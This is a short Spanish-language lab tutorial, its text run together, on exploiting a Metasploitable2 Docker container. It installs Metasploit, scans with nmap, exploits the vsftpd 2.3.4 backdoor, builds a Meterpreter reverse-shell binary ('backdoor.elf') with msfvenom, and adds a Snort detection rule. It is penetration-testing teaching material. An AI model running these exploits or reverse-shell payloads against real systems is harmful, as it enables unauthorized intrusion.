by Enrique Serrano Lendines


sudo apt install curl

curl utilizada para descargar archivos desde la línea de comandos.msfinstallcurl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

msfinstall desde el repositorio de Metasploit en GitHub.chmod 755 msfinstall

msfinstall.msfinstallsudo ./msfinstall

msfinstall. Añade Metasploit al listado de repositorios, actualiza el paquete cache e instala Metasploit Framework.msfupdate

msfconsole

docker pull tleemcjr/metasploitable2
docker run --name vulnerada -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"

sudo apt install nmapnmap -sS -Pn 172.17.0.2

nmap -sV -p 21 --script vuln 172.17.0.2

search vsftpd 2.3.4

use 0

show payloads

set payload payload/cmd/unix/interact

options

set rhost 172.17.0.2

run

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.18 LPORT=4444 -f elf -o backdoor.elf

sudo apt install -y snort



sudo nano /etc/snort/snort.confalert tcp any any -> any 21 (msg:"FTP ProFTPD ModCopy Remote Command Execution"; flow:to_server,established; content:"SITE CPFR"; sid:1000001;)

snort -A console -q -c /etc/snort/snort.conf
